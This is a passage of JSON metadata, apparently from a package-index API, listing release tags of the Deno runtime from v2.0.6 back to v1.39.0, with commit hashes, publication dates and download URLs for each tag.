"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"p